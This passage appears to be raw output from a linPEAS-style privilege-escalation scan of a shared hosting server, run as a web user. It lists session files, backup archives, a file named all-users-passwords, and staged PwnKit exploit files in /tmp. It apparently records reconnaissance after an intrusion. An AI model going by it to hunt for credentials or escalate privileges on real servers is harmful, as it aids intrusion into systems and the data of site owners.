cpguard 4096 Dec 23 16:01 cpguard drwxr-xr-x. 3 root root 4096 Sep 19 2024 imunify360 drwxr-xr-x 2 root root 4096 Apr 3 2025 liblve drwxr-xr-x 3 root root 4096 Sep 19 2024 plesk drwxr-xr-x 3 root root 4096 Feb 8 2025 suphp ╔══════════╣ Unexpected in root /home3 /home4 /home1 /home2 ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /opt/cloudlinux/litespeed_status /opt/cloudlinux/nginx_status /opt/cpguard/app/crons/.pid /usr/local/lsws/admin/htpasswds/status /var/lve/php.dat.d/php8.1.dat /var/lve/php.dat.d/phpnative.dat /var/lve/php.dat.d/php7.4.dat /var/lve/php.dat.d/php8.2.dat /var/lve/php.dat.d/php_native_ver.dat /var/lve/php.dat.d/php7.0.dat /var/lve/php.dat.d/php5.6.dat /var/lve/php.dat.d/php7.3.dat /var/lve/php.dat.d/php8.0.dat /var/lve/php.dat.d/php7.1.dat /var/lve/php.dat.d/php7.2.dat /tmp/all.txt /home2/webapps1/.cpanel/datastore/_Cpanel::Quota.pm__webapps1 /home2/webapps1/pickme24.com/public/error_log /home2/webapps1/pickme24.com/storage/logs/laravel.log /home2/webapps1/.cagefs/tmp/all.txt /home2/webapps1/advalves.ae/core/storage/framework/sessions/mzp5TdduUc9R9C8AuqSJNXeEvBJAFRM1RI0r2WdY /home2/webapps1/advalves.ae/core/storage/framework/sessions/0CQ7l6NhVV7TUJWXhXBfBU4ZIHsBsJPcLRZLctXw /home2/webapps1/advalves.ae/core/storage/framework/sessions/HJvdmYTCNqYaE2IkW44UdVbJQhkDwgFamvuj7CgW ╔══════════╣ Syslog configuration (limit 50) syslog configuration Not Found ╔══════════╣ Auditd configuration (limit 50) auditd configuration Not Found ╔══════════╣ Log files with potentially weak perms (limit 50)  ╔══════════╣ Files inside /home/webapps1 (limit 20) lrwxrwxrwx 1 root nobody 15 Dec 22 07:46 /home/webapps1 -> /home2/webapps1 ╔══════════╣ Files inside others home (limit 20) /var/www/html/accts_suspended_45_days_ago_1720296195.txt /var/www/html/cptechdomain.shtml /var/www/html/cp_errordocument.shtml /var/www/html/accts_suspended_45_days_ago_1762674492.txt /var/www/html/accts_suspended_45_days_ago_1672457790.txt /var/www/html/accts_suspended_45_days_ago_1738474516.txt /var/www/html/accts_suspended_45_days_ago_1693526670.txt /var/www/html/public_html.tar.gz /var/www/html/accts_suspended_45_days_ago_1699707173.txt /var/www/html/accts_suspended_45_days_ago_1690928860.txt /var/www/html/accts_suspended_45_days_ago_1722006691.txt /var/www/html/accts_suspended_60_days_ago_1684559674.txt /var/www/html/index.html /var/www/html/accts_suspended_45_days_ago_1696399739.txt /var/www/html/kernel.tar.gz /var/www/html/all-users-passwords /var/www/html/accts_suspended_45_days_ago_1696340391.txt /var/www/html/accts_suspended_45_days_ago_1703749037.txt /var/www/html/accts_suspended_45_days_ago_1726379823.txt /var/www/html/accts_suspended_45_days_ago_1692275000.txt ╔══════════╣ Searching installed mail applications exim sendmail ╔══════════╣ Mails (limit 50)  ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 2731 Dec 23 02:22 /opt/cloudlinux/venv/lib/python3.11/site-packages/clselect/clselectpython/__init__.py.bak -rw-r--r-- 1 root root 7138 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/form-data/README.md.bak -rw-r--r-- 1 root root 7138 Jan 11 2022 /opt/alt/alt-nodejs12/root/usr/lib/node_modules/npm/node_modules.bundled/form-data/README.md.bak -rw-r--r-- 1 root root 7138 Mar 23 2023 /opt/alt/alt-nodejs14/root/usr/lib/node_modules/npm/node_modules.bundled/form-data/README.md.bak -rwxr-xr-x 1 cpguard cpguard 3445 Jul 15 10:50 /opt/cpguard/app/scripts/backup.sh -rw-r--r-- 1 root root 1547 Oct 25 17:19 /usr/include/mysql/server/private/aria_backup.h -rw-r--r-- 1 root root 1703 Oct 25 17:19 /usr/include/mysql/server/private/backup.h -rw-r--r-- 1 root root 2552 Aug 13 2024 /usr/lib/modules/4.18.0-553.16.1.lve.el8.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz -rw-r--r--. 1 root root 2556 Feb 22 2024 /usr/lib/modules/4.18.0-513.18.1.el8_9.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz -rw-r--r-- 1 root root 596 Aug 5 2022 /usr/lib/systemd/system/jetbackup5d.service -rw-r--r-- 1 root root 7138 Mar 10 2021 /usr/lib/node_modules/npm/node_modules/form-data/README.md.bak -rw-r--r-- 1 root root 10397 Jul 15 2024 /usr/local/sitepad/includes71/main/backups.php -rw-r--r-- 1 root root 6154 Jul 15 2024 /usr/local/sitepad/includes71/main/backup_site.php -rw-r--r-- 1 root root 8842 Jul 15 2024 /usr/local/sitepad/includes53/main/backups.php -rw-r--r-- 1 root root 4744 Jul 15 2024 /usr/local/sitepad/includes53/main/backup_site.php -rw-r--r-- 1 root root 8974 Jul 15 2024 /usr/local/sitepad/includes56/main/backups.php -rw-r--r-- 1 root root 5392 Jul 15 2024 /usr/local/sitepad/includes56/main/backup_site.php -rw-r--r-- 1 root root 8805 Jul 15 2024 /usr/local/sitepad/includes52/main/backups.php -rw-r--r-- 1 root root 4736 Jul 15 2024 /usr/local/sitepad/includes52/main/backup_site.php -rw-r--r-- 1 root root 6154 Jul 15 2024 /usr/local/sitepad/www/themes/default/backups_theme.php -rw-r--r-- 1 root root 6448 Jul 15 2024 /usr/local/sitepad/www/themes/default/backup_site_theme.php -rw-r--r-- 1 root root 34610 Jul 15 2024 /usr/local/sitepad/includes/main/backups.php -rw-r--r-- 1 root root 18748 Jul 15 2024 /usr/local/sitepad/includes/main/backup_site.php -rw-r--r-- 1 root root 355 Oct 25 17:19 /usr/share/man/man1/wsrep_sst_backup.1.gz -rw-r--r--. 1 root root 43 Sep 14 2023 /usr/share/man/man1/doveadm-backup.1.gz -rw-r--r-- 1 root root 333 Oct 25 17:19 /usr/share/man/man1/mariabackup.1.gz -rw-r--r--. 1 root root 2670 Dec 8 2016 /usr/share/man/man1/db_hotbackup.1.gz -rw-r--r-- 1 root root 347 Oct 25 17:19 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz -rw-r--r-- 1 root root 1456 Oct 25 17:19 /usr/share/man/man1/myrocks_hotbackup.1.gz -rw-r--r-- 1 root root 42 Oct 25 17:42 /usr/share/man/man1/mariadb-backup.1.gz -r--r--r-- 1 root root 3124 Jul 15 09:03 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 2552 Aug 13 2024 /lib/modules/4.18.0-553.16.1.lve.el8.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz -rw-r--r--. 1 root root 2556 Feb 22 2024 /lib/modules/4.18.0-513.18.1.el8_9.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz -rw-r--r-- 1 root root 596 Aug 5 2022 /lib/systemd/system/jetbackup5d.service -rw-r--r-- 1 root root 7138 Mar 10 2021 /lib/node_modules/npm/node_modules/form-data/README.md.bak -rw-r--r-- 1 root root 2167 Dec 10 06:45 /var/softaculous/shopware/backup.php -rw-r--r-- 1 root root 2175 Dec 10 06:45 /var/softaculous/shopware/php53/backup.php -rw-r--r-- 1 root root 2200 Dec 10 06:45 /var/softaculous/shopware/php82/backup.php -rw-r--r-- 1 root root 2741 Dec 10 06:45 /var/softaculous/shopware/php56/backup.php -rw-r--r-- 1 root root 2175 Dec 10 06:45 /var/softaculous/shopware/php81/backup.php -rw-r--r-- 1 root root 2952 Dec 10 06:45 /var/softaculous/shopware/php71/backup.php -rw-r--r-- 1 root root 3103 Oct 9 08:27 /var/softaculous/wp58/backup.php -rw-r--r-- 1 root root 3091 Oct 9 08:27 /var/softaculous/wp58/php53/backup.php -rw-r--r-- 1 root root 3197 Oct 9 08:27 /var/softaculous/wp58/php82/backup.php -rw-r--r-- 1 root root 3734 Oct 9 08:27 /var/softaculous/wp58/php56/backup.php -rw-r--r-- 1 root root 3152 Oct 9 08:27 /var/softaculous/wp58/php81/backup.php -rw-r--r-- 1 root root 4026 Oct 9 08:27 /var/softaculous/wp58/php71/backup.php -rw-r--r-- 1 root root 3083 Oct 10 08:09 /var/softaculous/wp56/backup.php -rw-r--r-- 1 root root 3087 Oct 10 08:09 /var/softaculous/wp56/php53/backup.php -rw-r--r-- 1 root root 3168 Oct 10 08:09 /var/softaculous/wp56/php82/backup.php -rw-r--r-- 1 root root 3694 Oct 10 08:09 /var/softaculous/wp56/php56/backup.php -rw-r--r-- 1 root root 3136 Oct 10 08:09 /var/softaculous/wp56/php81/backup.php -rw-r--r-- 1 root root 4006 Oct 10 08:09 /var/softaculous/wp56/php71/backup.php -rw-r--r-- 1 root root 3099 Oct 1 09:10 /var/softaculous/wp64/backup.php -rw-r--r-- 1 root root 3103 Oct 1 09:10 /var/softaculous/wp64/php53/backup.php -rw-r--r-- 1 root root 3176 Oct 1 09:10 /var/softaculous/wp64/php82/backup.php -rw-r--r-- 1 root root 3694 Oct 1 09:10 /var/softaculous/wp64/php56/backup.php -rw-r--r-- 1 root root 3172 Oct 1 09:10 /var/softaculous/wp64/php81/backup.php -rw-r--r-- 1 root root 4034 Oct 1 09:10 /var/softaculous/wp64/php71/backup.php -rw-r--r-- 1 root root 3095 Oct 10 08:10 /var/softaculous/wp52/backup.php -rw-r--r-- 1 root root 3115 Oct 10 08:10 /var/softaculous/wp52/php53/backup.php -rw-r--r-- 1 root root 3193 Oct 10 08:10 /var/softaculous/wp52/php82/backup.php -rw-r--r-- 1 root root 3694 Oct 10 08:10 /var/softaculous/wp52/php56/backup.php -rw-r--r-- 1 root root 3148 Oct 10 08:10 /var/softaculous/wp52/php81/backup.php -rw-r--r-- 1 root root 4022 Oct 10 08:10 /var/softaculous/wp52/php71/backup.php -rw-r--r-- 1 root root 3111 Oct 3 08:52 /var/softaculous/wp67/backup.php -rw-r--r-- 1 root root 3107 Oct 3 08:52 /var/softaculous/wp67/php53/backup.php -rw-r--r-- 1 root root 3168 Oct 3 08:52 /var/softaculous/wp67/php82/backup.php -rw-r--r-- 1 root root 3694 Oct 3 08:52 /var/softaculous/wp67/php56/backup.php -rw-r--r-- 1 root root 3160 Oct 3 08:52 /var/softaculous/wp67/php81/backup.php -rw-r--r-- 1 root root 4018 Oct 3 08:52 /var/softaculous/wp67/php71/backup.php -rw-r--r-- 1 root root 3095 Oct 6 08:56 /var/softaculous/wp66/backup.php -rw-r--r-- 1 root root 3091 Oct 6 08:56 /var/softaculous/wp66/php53/backup.php -rw-r--r-- 1 root root 3193 Oct 6 08:56 /var/softaculous/wp66/php82/backup.php -rw-r--r-- 1 root root 3714 Oct 6 08:56 /var/softaculous/wp66/php56/backup.php -rw-r--r-- 1 root root 3152 Oct 6 08:56 /var/softaculous/wp66/php81/backup.php -rw-r--r-- 1 root root 4026 Oct 6 08:56 /var/softaculous/wp66/php71/backup.php -rw-r--r-- 1 root root 3091 Oct 1 09:11 /var/softaculous/wp60/backup.php -rw-r--r-- 1 root root 3087 Oct 1 09:11 /var/softaculous/wp60/php53/backup.php -rw-r--r-- 1 root root 3180 Oct 1 09:11 /var/softaculous/wp60/php82/backup.php -rw-r--r-- 1 root root 3690 Oct 1 09:11 /var/softaculous/wp60/php56/backup.php -rw-r--r-- 1 root root 3152 Oct 1 09:11 /var/softaculous/wp60/php81/backup.php -rw-r--r-- 1 root root 4034 Oct 1 09:11 /var/softaculous/wp60/php71/backup.php -rw-r--r-- 1 root root 3099 Oct 10 08:09 /var/softaculous/wp55/backup.php -rw-r--r-- 1 root root 3087 Oct 10 08:09 /var/softaculous/wp55/php53/backup.php -rw-r--r-- 1 root root 3201 Oct 10 08:09 /var/softaculous/wp55/php82/backup.php -rw-r--r-- 1 root root 3710 Oct 10 08:09 /var/softaculous/wp55/php56/backup.php -rw-r--r-- 1 root root 3144 Oct 10 08:09 /var/softaculous/wp55/php81/backup.php -rw-r--r-- 1 root root 4006 Oct 10 08:09 /var/softaculous/wp55/php71/backup.php -rw-r--r-- 1 root root 3087 Aug 13 03:15 /var/softaculous/wp51/backup.php -rw-r--r-- 1 root root 3087 Aug 13 03:15 /var/softaculous/wp51/php53/backup.php -rw-r--r-- 1 root root 3176 Aug 13 03:15 /var/softaculous/wp51/php82/backup.php -rw-r--r-- 1 root root 3706 Aug 13 03:15 /var/softaculous/wp51/php56/backup.php -rw-r--r-- 1 root root 3160 Aug 13 03:15 /var/softaculous/wp51/php81/backup.php -rw-r--r-- 1 root root 4030 Aug 13 03:15 /var/softaculous/wp51/php71/backup.php -rw-r--r-- 1 root root 3095 Dec 4 07:15 /var/softaculous/wp/backup.php ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /etc/pki/nssdb/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/cert9.db: SQLite 3.x database, last written using SQLite version 0 Found /etc/pki/nssdb/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/key4.db: SQLite 3.x database, last written using SQLite version 0 Found /etc/pki/nssdb/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /opt/ai-bolit/ai-bolit-hoster-full.cache.db: ASCII text, with very long lines, with no line terminators Found /opt/cpguard/3rdparty/lynis/db/control-links.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/fileperms.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/hints.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/integrity.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/malware-susp.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/malware.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/sbl.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/software-eol.db: ASCII text Found /opt/cpguard/3rdparty/lynis/db/tests.db: ASCII text Found /opt/cpguard/app/setup/common/schedule.db: SQLite 3.x database, last written using SQLite version 3049001 Found /opt/cpguard/app/setup/databases/schedule.db: SQLite 3.x database, last written using SQLite version 3007017  -> Extracting tables from /etc/pki/nssdb/cert9.db (limit 20)  -> Extracting tables from /etc/pki/nssdb/key4.db (limit 20)  ╔══════════╣ Web files?(output limit) /var/www/: total 16K drwxr-xr-x 4 root root 4.0K Sep 19 2024 . drwxr-xr-x 13 root root 4.0K Nov 30 04:32 .. drwxr-xr-x. 2 root root 4.0K Nov 19 15:30 cgi-bin drwxr-xr-x. 3 root root 4.0K Dec 14 02:42 html /var/www/cgi-bin: total 8.0K drwxr-xr-x. 2 root root 4.0K Nov 19 15:30 . ╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-r--r-- 1 root root 1 Mar 14 2025 /opt/alt/libxml2/usr/share/doc/alt-libxml2-devel/examples/.memdump -rw-r--r-- 1 root root 22 Feb 28 2025 /opt/alt/alt-nodejs18/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/.release-please-manifest.json -rw-r--r-- 1 root root 0 Feb 28 2025 /opt/alt/alt-nodejs18/root/usr/lib/node_modules/npm/.npmrc -rw-r--r-- 1 root root 7521 Dec 17 2024 /opt/alt/php82/usr/share/pear/.filemap -rw-r--r-- 1 root root 0 Dec 17 2024 /opt/alt/php82/usr/share/pear/.lock -rw-r--r-- 1 root root 7521 Dec 17 2024 /opt/alt/php56/usr/share/pear/.filemap -rw-r--r-- 1 root root 0 Dec 17 2024 /opt/alt/php56/usr/share/pear/.lock -rw-r--r-- 1 root root 7521 Dec 17 2024 /opt/alt/php81/usr/share/pear/.filemap -rw-r--r-- 1 root root 0 Dec 17 2024 /opt/alt/php81/usr/share/pear/.lock -rw-r--r-- 1 root root 22 Feb 28 2025 /opt/alt/alt-nodejs20/root/usr/lib/node_modules/npm/node_modules.bundled/node-gyp/.release-please-manifest.json -rw-r--r-- 1 root root 0 Feb 28 2025 /opt/alt/alt-nodejs20/root/usr/lib/node_modules/npm/.npmrc -rw-r--r-- 1 root root 7521 Dec 17 2024 /opt/alt/php74/usr/share/pear/.filemap -rw-r--r-- 1 root root 0 Dec 17 2024 /opt/alt/php74/usr/share/pear/.lock -rw-r--r-- 1 root root 7521 Dec 17 2024 /opt/alt/php70/usr/share/pear/.filemap -rw-r--r-- 1 root root 0 Dec 17 2024 /opt/alt/php70/usr/share/pear/.lock -rw-r--r-- 1 root root 7521 Dec 17 2024 /opt/alt/php71/usr/share/pear/.filemap -rw-r--r-- 1 root root 0 Dec 17 2024 /opt/alt/php71/usr/share/pear/.lock -rw-r--r-- 1 root root 65 Oct 6 2022 /opt/alt/openssl/lib64/.libssl.so.1.0.2u.hmac -rw-r--r-- 1 root root 65 Oct 6 2022 /opt/alt/openssl/lib64/.libcrypto.so.1.0.2u.hmac -rw-r--r-- 1 root root 179 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/err-code/.editorconfig -rw-r--r-- 1 root root 127 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/err-code/.eslintrc.json -rw-r--r-- 1 root root 84 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/socks/.prettierrc.yaml -rw-r--r-- 1 root root 220 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/promise-retry/.editorconfig -rw-r--r-- 1 root root 6 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/psl/.eslintignore -rw-r--r-- 1 root root 399 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/qs/.editorconfig -rw-r--r-- 1 root root 5 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/qs/.eslintignore -rw-r--r-- 1 root root 286 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/es-to-primitive/.editorconfig -rw-r--r-- 1 root root 4130 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/es-to-primitive/.jscs.json -rw-r--r-- 1 root root 193 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/performance-now/.tm_properties -rw-r--r-- 1 root root 1160 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/color-name/.eslintrc.json -rw-r--r-- 1 root root 276 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/object.getownpropertydescriptors/.editorconfig -rw-r--r-- 1 root root 4140 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/object.getownpropertydescriptors/.jscs.json -rw-r--r-- 1 root root 178 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/http-signature/.dir-locals.el -rw-r--r-- 1 root root 276 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/es-abstract/.editorconfig -rw-r--r-- 1 root root 234 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/es-abstract/.nycrc -rw-r--r-- 1 root root 4003 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/es-abstract/.jscs.json -rw-r--r-- 1 root root 286 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-callable/.editorconfig -rw-r--r-- 1 root root 4128 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-callable/.jscs.json -rw-r--r-- 1 root root 993 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-callable/.istanbul.yml -rw-r--r-- 1 root root 2878 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-date-object/.jscs.json -rw-r--r-- 1 root root 286 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/normalize-package-data/node_modules/resolve/.editorconfig -rw-r--r-- 1 root root 13 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/normalize-package-data/node_modules/resolve/.eslintignore -rw-r--r-- 1 root root 84 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/smart-buffer/.prettierrc.yaml -rw-r--r-- 1 root root 286 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/extend/.editorconfig -rw-r--r-- 1 root root 4096 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/extend/.jscs.json -rw-r--r-- 1 root root 46 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/debug/.coveralls.yml -rw-r--r-- 1 root root 276 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-symbol/.editorconfig -rw-r--r-- 1 root root 5 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-symbol/.nvmrc -rw-r--r-- 1 root root 4128 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-symbol/.jscs.json -rw-r--r-- 1 root root 715 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/https-proxy-agent/.editorconfig -rw-r--r-- 1 root root 2935 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/https-proxy-agent/.eslintrc.js -rw-r--r-- 1 root root 421 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/fs-vacuum/.eslintrc -rw-r--r-- 1 root root 286 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/function-bind/.editorconfig -rw-r--r-- 1 root root 4140 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/function-bind/.jscs.json -rw-r--r-- 1 root root 562 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/fast-json-stable-stringify/.eslintrc.yml -rw-r--r-- 1 root root 439 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/har-validator/node_modules/ajv/.tonic_example.js -rw-r--r-- 1 root root 62 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/har-validator/node_modules/ajv/scripts/.eslintrc.yml -rw-r--r-- 1 root root 91 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/har-validator/node_modules/json-schema-traverse/spec/.eslintrc.yml -rw-r--r-- 1 root root 630 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/har-validator/node_modules/json-schema-traverse/.eslintrc.yml -rw-r--r-- 1 root root 277 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/worker-farm/.editorconfig -rw-r--r-- 1 root root 276 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/define-properties/.editorconfig -rw-r--r-- 1 root root 4108 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/define-properties/.jscs.json -rw-r--r-- 1 root root 4140 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/node_modules.bundled/is-regex/.jscs.json -rw-r--r-- 1 root root 0 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/.npmrc -rw-r--r-- 1 root root 245 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/.licensee.json -rw-r--r-- 1 root root 3274 Mar 22 2023 /opt/alt/alt-nodejs10/root/usr/lib/node_modules/npm/.mailmap -rw-r--r-- 1 root root 7521 Dec 17 2024 /opt/alt/php73/usr/share/pear/.filemap -rw-r--r-- 1 root root 0 Dec 17 2024 /opt/alt/php73/usr/share/pear/.lock -rw-r--r-- 1 root root 22 Nov 6 2023 /opt/alt/krb5/usr/share/man/man5/.k5identity.5 -rw-r--r-- 1 root root 179 Jan 11 2022 /opt/alt/alt-nodejs12/root/usr/lib/node_modules/npm/node_modules.bundled/err-code/.editorconfig grep: write error: Broken pipe grep: write error: Broken pipe ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rw------- 1 webapps1 webapps1 59 Dec 20 17:41 /tmp/ci_smarthospital4if9ns7q5kl19mrfujd3223b98o5156k -rw------- 1 webapps1 webapps1 34 Dec 14 15:28 /tmp/ci_session95a6be4c3e14e10de5a89beef26b0518da82bf5e -rw------- 1 webapps1 webapps1 34 Dec 23 15:37 /tmp/ci_session6jl3l16rs1nkd63lsvf667j66u69jcsm -rw------- 1 webapps1 webapps1 7392530 Dec 21 19:04 /tmp/sortaNCHyH -rw------- 1 webapps1 webapps1 34 Dec 22 17:19 /tmp/ci_sessionlfuibb5d91doodnc87rr14j8lq3e9gmc -rw-rw-r-- 1 webapps1 webapps1 807 Dec 23 11:07 /tmp/pwnkit/pwn.so -rw-rw-r-- 1 webapps1 webapps1 29 Dec 23 11:07 /tmp/pwnkit/gconv-modules -rw------- 1 webapps1 webapps1 34 Nov 25 11:35 /tmp/ci_smarthospitalca80oe16nses7alh6dtvo3mlhrtrss6m -rw------- 1 webapps1 webapps1 34 Dec 23 15:37 /tmp/ci_session7m1cpb2j227nt8uth1h8n673a7d2asbe -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_session4050b69f79694eb01f6774b5d1ce8e84a2663c76 -rw------- 1 webapps1 webapps1 34 Dec 11 19:17 /tmp/ci_session71c96be5dc806210e02f07aa36c10461262895c6 -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_session7cbc85a09ed5b91db7b97d15674c387eac07f82a -rw------- 1 webapps1 webapps1 34 Dec 9 10:08 /tmp/ci_sessionb9d976905a08f314a1311f634585ea3c34b940a0 -rw------- 1 webapps1 webapps1 34 Dec 1 09:35 /tmp/ci_sessioneba0af3acd461af9d4735c871d938bb28856c144 -rw------- 1 webapps1 webapps1 34 Nov 29 02:51 /tmp/ci_smarthospitali4n5tdsdp5o7q96mbd6b89p9j29p2keb -rw------- 1 webapps1 webapps1 34 Dec 23 15:37 /tmp/ci_session8fi199odg9nd6e9pnnfdvosauoi37iig -rw------- 1 webapps1 webapps1 34 Dec 13 00:59 /tmp/ci_session590ad8206829235e3ea1d62d9f425eea0c48b443 -rw------- 1 webapps1 webapps1 34 Dec 23 15:37 /tmp/ci_session3fej79g9c5d6tj8klm410bl0cic15ogk -rw------- 1 webapps1 webapps1 34 Dec 3 16:51 /tmp/ci_session2ab0ae0b74b5378336f256031b6eaff398eda7bc -rw------- 1 webapps1 webapps1 34 Dec 11 02:39 /tmp/ci_smarthospital64377uo05tngmstub31ampc4926ia2lp -rw------- 1 webapps1 webapps1 7987389 Dec 21 19:01 /tmp/sortDZI8IS -rw------- 1 webapps1 webapps1 34 Dec 13 00:59 /tmp/ci_session451bc6e57ea169f6576a13bd061eea55441e8549 -rw------- 1 webapps1 webapps1 34 Nov 29 12:19 /tmp/ci_session6841766f654dc7c8dbbd7eb8fecb95441b12c176 -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_session00b0eaac0bc48715eeb3907279572eec23672c76 -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_session4cb79289ab72aa614f0b02581fa38109366262e0 -rw------- 1 webapps1 webapps1 34 Dec 7 14:44 /tmp/ci_smarthospitalqcu1gh9auh5nunr60un4v5gk42sk1r6g -rw------- 1 webapps1 webapps1 7723196 Dec 21 18:53 /tmp/sortbfNY4z -rw------- 1 webapps1 webapps1 59 Dec 12 09:59 /tmp/ci_session0a9f5f5c4a696df47c16b761a59bba86d3d60bba -rw------- 1 webapps1 webapps1 34 Dec 15 00:55 /tmp/ci_session49b2514943544f95f3b03926ccd84f66e08f0baa -rw------- 1 webapps1 webapps1 7680465 Dec 21 19:04 /tmp/sortWPFYoW -rw------- 1 webapps1 webapps1 34 Dec 1 03:28 /tmp/ci_session05acca14df55f2864a532e67af355d988158557b -rw------- 1 webapps1 webapps1 34 Dec 22 22:50 /tmp/ci_sessionu97avdfn8mpblem5adq3cf5stus9bbnj -rw------- 1 webapps1 webapps1 34 Dec 16 23:17 /tmp/ci_session11358be76fd11775b36a1adc2c71715f90a4fef3 -rw------- 1 webapps1 webapps1 34 Dec 1 15:36 /tmp/ci_smarthospitalc9llesm8te2repd70nf3k3630tt0d0iu -rw------- 1 webapps1 webapps1 34 Dec 23 18:08 /tmp/ci_session31mltkviuh526sbr6g3peqgi4core666 -rw------- 1 webapps1 webapps1 7440104 Dec 21 19:02 /tmp/sortlVSYcR -rw------- 1 webapps1 webapps1 34 Dec 22 18:38 /tmp/ci_smarthospitalfir6lmf5g4g31aaauo5reoaujjvfvd43 -rw------- 1 webapps1 webapps1 34 Dec 12 09:57 /tmp/ci_session5f2889d0e571b8594629bf3deee49c80501095fe -rw------- 1 webapps1 webapps1 34 Dec 12 15:39 /tmp/ci_sessionb4c4439bbc0bb07ffb1ab202418680d433c77eb2 -rw------- 1 